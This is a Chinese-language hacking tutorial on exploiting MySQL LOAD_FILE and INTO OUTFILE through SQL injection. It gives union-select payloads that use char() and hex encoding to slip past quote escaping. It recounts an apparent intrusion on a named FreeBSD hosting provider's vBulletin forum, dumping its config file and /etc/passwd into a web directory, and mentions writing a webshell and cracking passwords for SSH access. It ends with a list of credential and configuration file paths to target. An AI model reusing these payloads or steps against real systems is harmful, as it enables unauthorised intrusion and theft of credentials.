mysql LOAD_FILE 在資料庫注入中的使用

LOAD_FILE 函數只有滿足以下2個條件就可以使用

1.檔案許可權： chmod a+r  pathtofile
2.檔案大小： 必須小於max_allowed_packet

下面使用LOAD_FILE就可以擷取到系統敏感資訊

SELECT LOAD_FILE( 'D:/xampp/htdocs/www/wanju/htaccess.txt' )

SELECT LOAD_FILE('/etc/hosts')

　看到這裡，應該可以想到我們可以做什麼了，就是讀取一些機密檔案，但是也是有條件限制的：

      1、必須有許可權讀取並且檔案必須完全可讀
          and (select count(*) from mysql.user)>0/* 如果結果返回正常,說明具有讀寫權限。
      and (select count(*) from mysql.user)>0/* 返回錯誤，應該是管理員給資料庫帳戶降權了。
　　
　　2、欲讀取檔案必須在伺服器上

　　3、必須指定檔案完整的路徑

　　4、欲讀取檔案必須小於 max_allowed_packet

　　如果該檔案不存在，或因為上面的任一原因而不能被讀出，函數返回空。比較難滿足的就是許可權，在windows下，如果NTFS設定得當，是不能讀取相關的檔案的，當遇到只有administrators才能訪問的檔案，users就別想load_file出來。

　　在實際的注入中，我們有兩個痛點需要解決：
　　

　　絕對實體路徑

　　構造有效畸形語句

　　在很多PHP程式中，當提交一個錯誤的Query，如果display_errors = on，程式就會暴露WEB目錄的絕對路徑，只要知道路徑，那麼對於一個可以注入的PHP程式來說，整個伺服器的安全將受到嚴重的威脅。構造語句已經是小意思了。 　　

　　利用

　　我們假設一個程式的SQL語句如下： 　　

　　SELECT * FROM article WHERE articleid=$id

　　註：當前條件：magic_quotes_gpc = off，c:/boot.ini可讀。

　　此時，我們構造$id為： 　　

　　-1 union select 1,1,1,1,load_file('c:/boot.ini')

　　我們的Query就變成：
　　

　　SELECT * FROM article WHERE articleid=-1 union select 1,1,1,1,load_file('c:/boot.ini')

　　程式會把c:/boot.ini內容老老實實顯示出來，但是現在magic_quotes_gpc = off的主機少之又少，怎麼才能構造出沒有引號的語句呢？看過《SQL Injection with MySQL》的朋友肯定知道用char()函數或者把字元轉換成16進位，沒錯，就是它們。

　　註：當前條件：magic_quotes_gpc = on，c:/boot.ini可讀。

　　我們構造$id為： 　　

　　-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))

　　“char(99,58,47,98,111,111,116,46,105,110,105)”就是“c:/boot.ini”的ASCII代碼，我們的Query就變成：
　　

　　SELECT * FROM article WHERE articleid=-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))

　　我們也可以成功的讀取boot.ini檔案，還有把字串轉換為16進位的，“c:/boot.ini”的16進位是“0x633a2f626f6f742e696e69”，所以上面的語句可以是這樣： 　　

　　SELECT * FROM article WHERE articleid=-1 union select 1,1,1,load_file(0x633a2f626f6f742e696e69)

　　比較短了，看各人喜好了，大家可以在phpmyadmin或mysql>下輸入以下查詢慢慢研究。 　　

　　SELECT load_file([string])

　　當然，在實際應用中，由於種種條件限制，檔案的內容未必會顯示出來，我們也可以用into outfile把檔案匯出。大家已經知道如何利用了，我也不說細節了，看一個執行個體說明一切。 　　

　　執行個體

　　www.***host.cn是我國著名的FreeBSD主機供應商，我們就拿他來測試，因為它的論壇採用的是calendar.php存在問題的VBB論壇，我就不需要到處去找有漏洞的網站了（雖然到處都是）。這是一次完整的安全性測試。僅僅擷取資訊，我並未進入伺服器。

　　這裡補充說明一點關於VBB的根目錄下global.php的一段代碼，如下： 　　

　　// get rid of slashes in get / post / cookie data

　　function stripslashesarray (&$arr) {

　　　　while (list($key,$val)=each($arr)) {

　　　　　　if ($key!="templatesused" and $key!="argc" and $key!="argv") {

　　　　　　　　if (is_string($val) AND (strtoupper($key)!=$key OR ("".intval($key)=="$key"))) {

　　　　　　　　　　$arr["$key"] = stripslashes($val);

　　　　　　　　} else if (is_array($val) AND ($key == 'HTTP_POST_VARS' OR $key == 'HTTP_GET_VARS' OR strtoupper($key)!=$key)) {

　　　　　　　　　　$arr["$key"] = stripslashesarray($val);

　　　　　　　　}

　　　　　　}

　　　　}

　　　　return $arr;

　　}

　　if (get_magic_quotes_gpc() and is_array($GLOBALS)) {

　　　　if (isset($attachment)) {

　　　　　　$GLOBALS['attachment'] = addslashes($GLOBALS['attachment']);

　　　　}

　　　　if (isset($avatarfile)) {

　　　　　　$GLOBALS['avatarfile'] = addslashes($GLOBALS['avatarfile']);

　　　　}

　　　　$GLOBALS = stripslashesarray($GLOBALS);

　　}

　　

　　set_magic_quotes_runtime(0);

　　

　　這段代碼的作用就是如果magic_quotes_gpc開啟，就去掉所有特殊字元的前面的逸出字元，所以，不管php.ini裡magic_quotes_gpc的狀態如何，我們輸入的單引號都沒有影響的，大家可以放心注入。呵呵。

　　我們知道，提交：
　　

　　/calendar.php?action=edit&eventid=1 UNION SELECT 1,1,1,1,username,password FROM user WHERE userid=1

　　是可以擷取使用者名稱和密碼MD5散列的，但是由於特殊原因，並沒有顯示出來，但憑我的經驗，知道並沒有構造錯，所以我們可以讀取並匯出成檔案。

　　因為事先我無意中訪問到了含有phpinfo()的檔案，所以知道了WEB的絕對路徑，從訪問網站的結果，發現一個下載系統是產生HTML檔案的，如果那個目錄沒有可寫入權限，是不能產生HTML檔案的，不過這一切都不是本文的重點，我們現在掌握如下資訊： 　　

　　WEB絕對路徑：/home/4ngel

　　可寫目錄路徑：/home/4ngel/soft/

　　magic_quotes_gpc = on

　　和主機root相比，論壇的admin根本就不算什麼，我對論壇admin也不感興趣，我們要讀取論壇的設定檔還有/etc/passwd，知道MySQL的串連資訊，可以從這裡入手，寫webshell或其他的東西，知道/etc/passwd我們可以跑密碼。直接從ssh上去。

　　VBB論壇的設定檔在/home/4ngel/forum/admin/config.php,轉換成ASCII代碼，提交：
　　

　　calendar.php?action=edit&eventid=1 UNION SELECT 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) FROM user WHERE userid=1 into outfile '/home/4ngel/soft/cfg.txt'

　　呵呵，記得加一個where來定一個條件，否則如果論壇使用者很多，那麼匯出的檔案會相當大。或者乾脆指定$eventid為一個不存在的值，就不用where了，就像這樣：
　　

　　calendar.php?action=edit&eventid=-1 UNION SELECT 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) FROM user into outfile '/home/4ngel/soft/cfg.txt'

　　/etc/passwd轉換成ASCII代碼，提交：

　　

　　calendar.php?action=edit&eventid=-1 UNION SELECT 1,1,1,1,1, load_file (char(47,101,116,99,47,112,97,115,115,119,100)) FROM user into outfile '/home/4ngel/soft/etcpwd.txt'

　　注意看到論壇的頂部，會出現下面的錯誤提示：
　　

　　Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/4ngel/forum/admin/db_mysql.php on line 154

　　經驗告訴我們，檔案匯出成功了，提交： 　　

　　http://www.xxxhost.cn/soft/cfg.txt

　　http://www.xxxhost.cn/soft/etcpwd.txt

　　內容嘩啦啦的出來了，而黑夜和豬蛋的他們入侵灰色的時候，一個個顯示密碼，欺騙，登陸後台，上傳後門，讀取config.php，一連串的步驟，我一個load_file()就搞定了。是不是危害很大？

　　我記得在某個群裡討論到大家都是通過搞9****.net這個站，而進入黑白伺服器的，沒有辦法對黑白橫衝直闖，只得來曲線的。用load_file()函數，知道了某些資訊就可以進入黑白所在的伺服器，過程和上面的一樣，利用show.php的漏洞，直接load_file出程式的設定檔，知道了mysql的資訊，遠端連線，寫資料庫匯出檔案，很容易獲得伺服器admin。 　　

　　後記 ：
關於MYSQL into outfile注射
其實網上已經有很多關於mysql注射的文章了~ 不過還是缺乏重點吧~ 要使用 into outfile 把代碼寫到web目錄取得WEBSHELL
首先需要 3大先天條件
 
①知道實體路徑(into outfile '實體路徑') 這樣才能寫對目錄
 
②能夠使用union (也就是說需要MYSQL3以上的版本)
 
③對方沒有對’進行過濾(因為outfile 後面的 '' 不可以用其他函數代替轉換)
 
後天條件就要2個
 
①就是MYSQL 使用者擁有file_priv許可權(不然就不能寫檔案 或者把檔案內容讀出)
 
②對web目錄有寫入權限MS 的系統就不說了一般都會有許可權的~但是*nix 的系統嘛！通常都是rwxr-xr-x 也就是說組跟其他使用者都沒有許可權寫操作 所以嘛... 要滿足這5大條件還是蠻高難度的

Mysql的loadfile()常見用法

1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)

2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面兩個是查看一個PHP檔案裡完全顯示代碼.有些時候不替換一些字元,如 “<” 替換成”空格” 返回的是網頁.而無法查看到代碼.

3、 load_file(char(47)) 可以列出FreeBSD,Sunos系統根目錄

4、/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虛擬機器主機設定檔

5、c:Program FilesApache GroupApacheconf httpd.conf 或C:apacheconf httpd.conf    查看WINDOWS系統apache檔案

6、c:/Resin-3.0.14/conf/resin.conf 查看jsp開發的網站 resin檔案配置資訊.

7、c:/Resin/conf/resin.conf     /usr/local/resin/conf/resin.conf 查看linux系統配置的JSP虛擬機器主機

8、d:APACHEApache2confhttpd.conf

9、C:Program Filesmysqlmy.ini

10、../themes/darkblue_orange/layout.inc.php    phpmyadmin 爆路徑

11、    c:windowssystem32inetsrvMetaBase.xml 查看IIS的虛擬機器主機設定檔

12、 /usr/local/resin-3.0.22/conf/resin.conf    針對3.0.22的RESIN設定檔查看

13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上

14 、/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虛擬機器主機查看

15、 /etc/sysconfig/iptables 本看防火牆策略

16 、 usr/local/app/php5/lib/php.ini    PHP 的相當設定

17 、/etc/my.cnf    MYSQL的設定檔

18、 /etc/redhat-release 紅帽子的系統版本

19 、C:mysqldatamysqluser.MYD 存在MYSQL系統中的使用者密碼

20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.

21、/usr/local/app/php5/lib/php.ini //PHP相關設定

22、/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虛擬網站設定

23、c:Program FilesRhinoSoft.comServ-UServUDaemon.ini

24、c:windowsmy.ini